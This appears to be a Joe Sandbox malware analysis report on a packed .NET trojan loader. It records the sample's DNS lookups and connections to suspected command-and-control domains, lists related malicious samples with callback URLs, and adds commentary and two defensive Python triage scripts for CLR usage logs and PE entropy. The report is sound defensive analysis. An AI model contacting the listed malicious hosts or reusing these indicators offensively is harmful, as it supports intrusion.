http://www.fontbureau.com/designers3 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmp | false | - | high

                                                              Contacted IPs


                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
54.194.41.141 | domains.readymag.com | United States | 16509 | AMAZON-02US | false
172.67.147.111 | www.munortiete.com | United States | 13335 | CLOUDFLARENETUS | true

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483640
Start date: 15.09.2021
Start time: 10:37:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: TPJX2QwEdXs5sTV.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/1@7/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 9.2% (good quality ratio 8.8%)
• Quality average: 77%
• Quality standard deviation: 26%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Processes excluded from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• IPs excluded from analysis (whitelisted): 23.35.236.56, 20.82.210.154, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208
• Domains excluded from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtAllocateVirtualMemory calls found

                                                              Simulations

                                                              Behavior and APIs

                                                               Time | Type | Description
                                                               10:38:48 | API Interceptor | 1x Sleep call for process: TPJX2QwEdXs5sTV.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                               Match | Associated Sample Name / URL | Detection | Context
                                                               54.194.41.141 | PO889876.pdf.exe | malicious | www.maleev.design/a7dr/?NTots4J=R9ptnxQNB44VdMlgavxu7aNuHoyYBwaJO8KVHTec7XFz9L8vbWf1S3lhRtFZGNrBr39p&Ch9De=9rj01Zg0
                                                               54.194.41.141 | DHL Receipt_AWB811470484778.exe | malicious | www.maleev.design/a7dr/?vT=R9ptnxQNB44VdMlgavxu7aNuHoyYBwaJO8KVHTec7XFz9L8vbWf1S3lhRtFZGNrBr39p&S0Gl9T=RPHlpDKhNf_x
                                                               54.194.41.141 | Nigj57ar4W.exe | malicious | www.zuluforest.com/g050/?QZ3d8rFH=51f9LteLSLtZ/KEFFUFc6GczSQZWKxJptRVR4rE3mzWWLUSWQ1nFrlc8EIzEiz7hG4yH&3fnDH=hpvPaByp64GpMl8p

                                                              Domains

                                                               Match | Associated Sample Name / URL | Detection | Context
                                                               domains.readymag.com | PO889876.pdf.exe | malicious | 54.194.41.141
                                                               domains.readymag.com | DHL Receipt_AWB811470484778.exe | malicious | 54.194.41.141

                                                              ASN

                                                               Match | Associated Sample Name / URL | Detection | Context
                                                               AMAZON-02US | tgamf4XuLa.exe | malicious | 99.83.154.118
                                                               AMAZON-02US | SRMETALINDUSTRIES.exe | malicious | 44.227.65.245
                                                               AMAZON-02US | PI L032452021xxls.exe | malicious | 99.83.154.118
                                                               AMAZON-02US | Unpaid invoice.exe | malicious | 99.83.154.118
                                                               AMAZON-02US | FaxGUO65DE.391343-Faa.html | malicious | 3.139.50.24
                                                               AMAZON-02US | FaxGUO65DE.391343-Faa.html | malicious | 3.139.50.24
                                                               AMAZON-02US | Elon Musk Club - 024705 .htm | malicious | 13.226.156.103
                                                               AMAZON-02US | PGQBjDmDZ4 | malicious | 34.249.145.219
                                                               AMAZON-02US | m5DozqUO2t | malicious | 54.70.167.99
                                                               AMAZON-02US | avxeC9Wssi | malicious | 13.52.148.225
                                                               AMAZON-02US | Wh3hrPWbBG | malicious | 34.249.145.219
                                                               AMAZON-02US | re2.x86 | malicious | 184.77.232.100
                                                               AMAZON-02US | re2.arm7 | malicious | 63.32.132.1
                                                               AMAZON-02US | Fourlokov9.x86 | malicious | 34.249.145.219
                                                               AMAZON-02US | re2.x86 | malicious | 54.96.126.50
                                                               AMAZON-02US | re2.arm | malicious | 18.226.174.198
                                                               AMAZON-02US | XbvAoRKnFm.exe | malicious | 52.218.0.168
                                                               AMAZON-02US | Enclosed.xlsx | malicious | 13.238.159.178
                                                               AMAZON-02US | HBW PAYMENT LIST FOR 2021,20210809.xlsx | malicious | 3.139.183.122
                                                               AMAZON-02US | debit.xlsx | malicious | 52.77.232.215

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TPJX2QwEdXs5sTV.exe.log
                                                              Process:C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.355304211458859
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
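The dropped file above is not something the sample writes on purpose: the .NET Framework 4.x runtime records every assembly a managed process binds in %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log, which is consistent with the report rating it both Malicious (created by the sample's process) and very likely benign (content). For host triage the same file is evidence that TPJX2QwEdXs5sTV.exe executed under the CLR and which framework assemblies it pulled in. The parser below is an added example, not part of the Joe Sandbox report or of the sample; the meaning it assigns to the leading record kind is inferred from the preview's layout and is labelled as an assumption in the code, and the embedded sample text is constructed to match that layout rather than being the byte-exact file.

```python
r"""List the assemblies a .NET process loaded, from its CLR usage log.

The .NET Framework 4.x runtime writes one <exe name>.log per executed assembly
under %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs (CLR_v4.0 for 64-bit
processes). Lines are comma-separated with quoted fields, as in the preview."""
from __future__ import annotations

import csv
import io
from pathlib import Path

# Constructed sample modelled on the report's preview (CRLF-terminated like the
# on-disk file); it is not the byte-exact log from the sandbox run.
SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\\System.ni.dll",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
)


def parse_usage_log(text: str) -> list[dict]:
    """One record per assembly-binding line.

    The meaning of the leading record kind is inferred from the layout, not from
    a published format description (assumption): kind 1 lines are runtime
    context headers, kind 2 lines name a bound assembly, kind 3 lines also carry
    the native image (NGEN) path the assembly was served from."""
    records = []
    for row in csv.reader(io.StringIO(text, newline="")):
        if not row:
            continue
        kind = int(row[0])
        if kind not in (2, 3):
            continue
        display_name = row[1]
        records.append({"name": display_name.split(",", 1)[0],
                        "display_name": display_name,
                        "native_image": row[2] if kind == 3 else None})
    return records


def scan_usage_logs(directory: Path) -> dict[str, list[str]]:
    """Map every executed .NET binary (log file name minus .log) to its assembly names.
    Point it at a copied UsageLogs directory during host triage."""
    result = {}
    for log in sorted(Path(directory).glob("*.log")):
        text = log.read_text(encoding="utf-8", errors="replace")
        result[log.name[:-len(".log")]] = [r["name"] for r in parse_usage_log(text)]
    return result


if __name__ == "__main__":
    for rec in parse_usage_log(SAMPLE_LOG):
        print(f'{rec["name"]:22} {rec["native_image"] or "(JIT, no native image)"}')
```

Running the script on the constructed sample lists System.Windows.Forms, System (served from its NGEN image) and System.Drawing; on a live host, scan_usage_logs over a copy of the UsageLogs directory gives one entry per .NET executable that ran under that user account, which is the question an incident responder is usually asking.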

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.724399427496627
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:TPJX2QwEdXs5sTV.exe
                                                              File size:671232
                                                              MD5:ce556ce97ea23cbc2940f2aad45d468f
                                                              SHA1:cc2bdaefa2f0ac108e2f456e42a42e8258580cf4
                                                              SHA256:7c3d5ebd2c417a52b2a0b98dee95b5a7f283816f6a2453ceeffd31becc140882
                                                              SHA512:82d4d71aeb5118d600394c64eb127ca4a87d7b83702feb4f9c5b0a0d98a597f812ebfd16784cbde54b9f4b1c87d3c7eaf57fb1c86b9720df95419887fc13f77b
                                                              SSDEEP:12288:cC2I/yzQs2TaIpIByklwoL18/kdfskxRXP6erdH2fQiZ8uXpIe:cOMIpIBG/CUqRXP64gf5Ie
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .Aa.....................n......".... ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:f1f0f4d0eecccc71

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x49ed22
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x61419020 [Wed Sep 15 06:18:08 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                               jmp dword ptr [00402000h]
                                                               (the 97 instructions that follow in the preview, each `add byte ptr [eax], al`, are the disassembly of zero bytes: padding, not code)

                                                               The six-byte stub at RVA 0x9ed22 is the native entry point every .NET Framework executable carries. Its operand 0x402000 is ImageBase (0x400000) plus the IAT RVA (0x2000, IMAGE_DIRECTORY_ENTRY_IAT, size 8), i.e. the single import slot that the loader fills with mscoree.dll!_CorExeMain, the only import listed below. Native code ends here; the sample's own logic is CIL and has to be read from the managed metadata, not from this entry point.

                                                              Data Directories

                                                               Name | Virtual Address | Virtual Size | Is in Section
                                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ecc8 | 0x57 | .text
                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x6b3c | .rsrc
                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
                                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                              Sections

                                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                               .text | 0x2000 | 0x9cd28 | 0x9ce00 | False | 0.870889877988 | data | 7.79647412085 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                               .reloc | 0xa0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                               .rsrc | 0xa2000 | 0x6b3c | 0x6c00 | False | 0.441261574074 | data | 5.13425944435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                               Name | RVA | Size | Type
                                                               RT_ICON | 0xa22b0 | 0x668 | data
                                                               RT_ICON | 0xa2918 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                                               RT_ICON | 0xa2c00 | 0x128 | GLS_BINARY_LSB_FIRST
                                                               RT_ICON | 0xa2d28 | 0xea8 | data
                                                               RT_ICON | 0xa3bd0 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                               RT_ICON | 0xa4478 | 0x568 | GLS_BINARY_LSB_FIRST
                                                               RT_ICON | 0xa49e0 | 0x25a8 | data
                                                               RT_ICON | 0xa6f88 | 0x10a8 | data
                                                               RT_ICON | 0xa8030 | 0x468 | GLS_BINARY_LSB_FIRST
                                                               RT_GROUP_ICON | 0xa8498 | 0x84 | data
                                                               RT_VERSION | 0xa851c | 0x46c | data
                                                               RT_MANIFEST | 0xa8988 | 0x1b4 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                               The Type column is libmagic's guess on the raw resource bytes; "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" are its usual false matches on the DIB headers of icon bitmaps and do not point to any embedded database or other payload. The Language and Country columns of the original table are empty for every entry.

                                                              Imports

                                                               DLL | Import
                                                               mscoree.dll | _CorExeMain
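The numbers in the Static PE Info block can be rechecked on any PE32 with a short header walk, which is also how to spot the two things that matter in this sample before opening a decompiler: the image is managed (a non-empty COM descriptor directory and a lone mscoree!_CorExeMain import) and its only code section has entropy close to 8 bits per byte, the signature of an encrypted or compressed payload waiting for an in-process unpacker. The following is an added example and not part of the Joe Sandbox report or of the sample: it uses the standard library only, computes per-section Shannon entropy (the report shows 7.796 for .text), and confirms that the entry point is the managed stub jmp dword ptr [IAT] whose operand equals ImageBase + IAT RVA (0x400000 + 0x2000 = 0x402000 here). The 7.0 entropy threshold and the build_test_image helper, which fabricates a minimal PE for the offline check, are this example's own assumptions.

```python
"""Static triage of a PE32 along the lines of the Static PE Info above: is the
image managed (.NET), is its native entry point just the CLR stub
`jmp dword ptr [IAT]` to mscoree!_CorExeMain, and which sections have entropy
high enough to suggest an encrypted or compressed payload. Standard library only."""
from __future__ import annotations

import math
import struct
import sys

ENTROPY_PACKED = 7.0          # assumption: above this, treat a section as packed
DIR_IAT, DIR_CLR = 12, 14     # IMAGE_DIRECTORY_ENTRY_IAT / _COM_DESCRIPTOR


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(image: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF/optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    image_base = struct.unpack_from("<I", image, opt + 28)[0]
    ndirs = struct.unpack_from("<I", image, opt + 92)[0]
    dirs = [struct.unpack_from("<II", image, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize,
                         "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def rva_to_offset(pe: dict, rva: int) -> int:
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is outside every section")


def triage(image: bytes) -> dict:
    pe = parse_pe32(image)
    dirs = pe["dirs"]
    iat_rva = dirs[DIR_IAT][0] if len(dirs) > DIR_IAT else 0
    clr_size = dirs[DIR_CLR][1] if len(dirs) > DIR_CLR else 0
    ep = rva_to_offset(pe, pe["entry_rva"])
    stub = image[ep:ep + 6]
    # FF 25 imm32 is `jmp dword ptr [imm32]`. In a managed EXE the operand is the
    # absolute address of the one IAT slot, which the loader fills with _CorExeMain.
    is_clr_stub = (stub[:2] == b"\xff\x25"
                   and struct.unpack_from("<I", stub, 2)[0] == pe["image_base"] + iat_rva)
    return {"is_dotnet": clr_size != 0,
            "entry_is_clr_stub": is_clr_stub,
            "section_entropy": {s["name"]: round(s["entropy"], 3) for s in pe["sections"]},
            "packed_sections": [s["name"] for s in pe["sections"] if s["entropy"] > ENTROPY_PACKED]}


def build_test_image(text: bytes, entry_rva: int, dotnet: bool = True) -> bytes:
    """Constructed minimal PE32 with a single .text section, for offline checks only.
    IAT at RVA 0x2000 and CLR header at 0x2008 mirror the layout in the report;
    this is not the analysed sample."""
    raw_size = (len(text) + 0x1FF) & ~0x1FF
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, one section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_IAT, 0x2000, 8)
    if dotnet:
        struct.pack_into("<II", opt, 96 + 8 * DIR_CLR, 0x2008, 0x48)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000, raw_size, 0x200,
                      0, 0, 0, 0, 0x60000020)                      # CODE|EXECUTE|READ
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    return headers + text.ljust(raw_size, b"\0")


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:
        print(triage(fh.read()))
```

Run as a script against a file it prints the triage dictionary; for a loader like this one the expected picture is is_dotnet and entry_is_clr_stub both true with .text in packed_sections, which is the cue to unpack in a .NET debugger or by dumping the process after the "potential unpacker" has run rather than to spend time on native disassembly.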

                                                              Version Infos

                                                               Description | Data
                                                               Translation | 0x0000 0x04b0
                                                               LegalCopyright | Copyright 2008 - 2010
                                                               Assembly Version | 1.3.0.0
                                                               InternalName | BINDOP.exe
                                                               FileVersion | 1.3.0.0
                                                               CompanyName | WHC
                                                               LegalTrademarks |
                                                               Comments | A little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                               ProductName | RYL Character Tool - RoW EU version
                                                               ProductVersion | 1.3.0.0
                                                               FileDescription | RYL Character Tool - RoW EU version
                                                               OriginalFilename | BINDOP.exe

                                                               The version resource describes an unrelated hobby tool (a character-stat viewer for the game Risk Your Life), and its OriginalFilename, BINDOP.exe, does not match the submitted file name. Recycled version info of this kind is typical of crypted .NET loaders and carries no attribution value; the mismatch itself is a usable triage flag.

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                               09/15/21-10:40:22.963692 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49809 | 54.194.41.141 | 192.168.2.7
                                                               09/15/21-10:40:30.779091 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.7 | 8.8.8.8

                                                               SID 1201 matches the HTTP 403 in the server's reply (source port 80 back to the sample's port 49809), so the alert records that the sample reached out to 54.194.41.141 and was refused; it is not evidence of inbound attacker traffic. The full exchange is the port 49809 conversation in the TCP Packets table.

                                                              Network Port Distribution

                                                              TCP Packets

                                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                               Sep 15, 2021 10:40:22.870871067 CEST | 49809 | 80 | 192.168.2.7 | 54.194.41.141
                                                               Sep 15, 2021 10:40:22.916246891 CEST | 80 | 49809 | 54.194.41.141 | 192.168.2.7
                                                               Sep 15, 2021 10:40:22.916414022 CEST | 49809 | 80 | 192.168.2.7 | 54.194.41.141
                                                               Sep 15, 2021 10:40:22.916647911 CEST | 49809 | 80 | 192.168.2.7 | 54.194.41.141
                                                               Sep 15, 2021 10:40:22.961667061 CEST | 80 | 49809 | 54.194.41.141 | 192.168.2.7
                                                               Sep 15, 2021 10:40:22.963691950 CEST | 80 | 49809 | 54.194.41.141 | 192.168.2.7
                                                               Sep 15, 2021 10:40:22.963721991 CEST | 80 | 49809 | 54.194.41.141 | 192.168.2.7
                                                               Sep 15, 2021 10:40:22.968941927 CEST | 49809 | 80 | 192.168.2.7 | 54.194.41.141
                                                               Sep 15, 2021 10:40:22.968986034 CEST | 49809 | 80 | 192.168.2.7 | 54.194.41.141
                                                               Sep 15, 2021 10:40:23.020061970 CEST | 80 | 49809 | 54.194.41.141 | 192.168.2.7
                                                               Sep 15, 2021 10:40:34.881098986 CEST | 49810 | 80 | 192.168.2.7 | 172.67.147.111
                                                               Sep 15, 2021 10:40:34.897906065 CEST | 80 | 49810 | 172.67.147.111 | 192.168.2.7
                                                               Sep 15, 2021 10:40:34.908710957 CEST | 49810 | 80 | 192.168.2.7 | 172.67.147.111
                                                               Sep 15, 2021 10:40:34.909507036 CEST | 49810 | 80 | 192.168.2.7 | 172.67.147.111
                                                               Sep 15, 2021 10:40:34.926214933 CEST | 80 | 49810 | 172.67.147.111 | 192.168.2.7
                                                               Sep 15, 2021 10:40:34.941842079 CEST | 80 | 49810 | 172.67.147.111 | 192.168.2.7
                                                               Sep 15, 2021 10:40:34.941930056 CEST | 80 | 49810 | 172.67.147.111 | 192.168.2.7
                                                               Sep 15, 2021 10:40:34.942150116 CEST | 49810 | 80 | 192.168.2.7 | 172.67.147.111
                                                               Sep 15, 2021 10:40:34.942254066 CEST | 49810 | 80 | 192.168.2.7 | 172.67.147.111
                                                               Sep 15, 2021 10:40:34.958969116 CEST | 80 | 49810 | 172.67.147.111 | 192.168.2.7

                                                              UDP Packets


                                                              ICMP Packets

                                                              Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                                              Sep 15, 2021 10:40:30.779090881 CEST | 192.168.2.7 | 8.8.8.8 | cffb | (Port unreachable) | Destination Unreachable

                                                              DNS Queries

                                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                              Sep 15, 2021 10:40:17.770468950 CEST | 192.168.2.7 | 8.8.8.8 | 0x3f3c | Standard query (0) | www.ice-lemon.pro | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:22.819891930 CEST | 192.168.2.7 | 8.8.8.8 | 0x424a | Standard query (0) | www.indianadogeavaxsite.site | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:27.972635031 CEST | 192.168.2.7 | 8.8.8.8 | 0x4193 | Standard query (0) | www.pierrot-bros.com | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:28.970036983 CEST | 192.168.2.7 | 8.8.8.8 | 0x4193 | Standard query (0) | www.pierrot-bros.com | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:34.846492052 CEST | 192.168.2.7 | 8.8.8.8 | 0x5287 | Standard query (0) | www.munortiete.com | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:44.972348928 CEST | 192.168.2.7 | 8.8.8.8 | 0x14a0 | Standard query (0) | www.438451.com | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:50.800831079 CEST | 192.168.2.7 | 8.8.8.8 | 0xc584 | Standard query (0) | www.fanpaixiu.xyz | A (IP address) | IN (0x0001)

                                                              DNS Answers

                                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                              Sep 15, 2021 10:40:17.801754951 CEST | 8.8.8.8 | 192.168.2.7 | 0x3f3c | Server failure (2) | www.ice-lemon.pro | none | none | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:22.864661932 CEST | 8.8.8.8 | 192.168.2.7 | 0x424a | No error (0) | www.indianadogeavaxsite.site | domains.readymag.com | - | CNAME (Canonical name) | IN (0x0001)
                                                              Sep 15, 2021 10:40:22.864661932 CEST | 8.8.8.8 | 192.168.2.7 | 0x424a | No error (0) | domains.readymag.com | - | 54.194.41.141 | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:29.799778938 CEST | 8.8.8.8 | 192.168.2.7 | 0x4193 | Server failure (2) | www.pierrot-bros.com | none | none | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:30.778945923 CEST | 8.8.8.8 | 192.168.2.7 | 0x4193 | Server failure (2) | www.pierrot-bros.com | none | none | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:34.879271030 CEST | 8.8.8.8 | 192.168.2.7 | 0x5287 | No error (0) | www.munortiete.com | - | 172.67.147.111 | A (IP address) | IN (0x0001)
